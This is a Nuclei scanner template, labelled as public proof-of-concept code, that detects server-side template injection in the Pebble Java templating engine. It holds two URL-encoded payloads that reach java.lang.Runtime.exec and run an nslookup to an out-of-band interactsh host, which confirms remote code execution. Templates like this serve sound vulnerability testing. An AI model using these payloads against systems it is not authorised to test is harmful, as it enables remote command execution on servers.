Pebble is a Java templating engine inspired by Twig and similar to the Python Jinja Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
PoC代码[已公开]
id: pebble-oob
info:
name: Pebble - Out of Band Template Injection
author: ritikchaddha
severity: high
description: |
Pebble is a Java templating engine inspired by Twig and similar to the Python Jinja Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization.
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#pebble---code-execution
metadata:
max-request: 1
tags: ssti,dast,pebble,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- "{%25%20set%20cmd%20=%20%27nslookup%20-type=SRV%20{{interactsh-url}}%27%20%25}{%25%20set%20bytes%20%3D%20(1).TYPE.forName(%27java.lang.Runtime%27).methods%5B6%5D.invoke(null,null).exec(cmd).inputStream.readAllBytes()%20%25}{{%20(1).TYPE.forName(%27java.lang.String%27).constructors%5B0%5D.newInstance((%5Bbytes%5D).toArray())%20}}"
- "{{%20variable.getClass().forName(%27java.lang.Runtime%27).getRuntime().exec(%27nslookup%20-type=SRV%20{{interactsh-url}}%27)%20}}"
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{injection}}"
skip-variables-check: true
matchers:
- type: dsl
name: request-matcher
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(interactsh_request,'srv')"
condition: and
# digest: 4a0a0047304502202973ce41aba5444756d121a20dabe25b8d0f799b32f9961010f5c1e70a68cd3a022100caee28c8c1510c25bc56b2b29702dfe80b13e4f9507c510616c9a2deed75440c:922c64590222798bb761d5b6d8e72950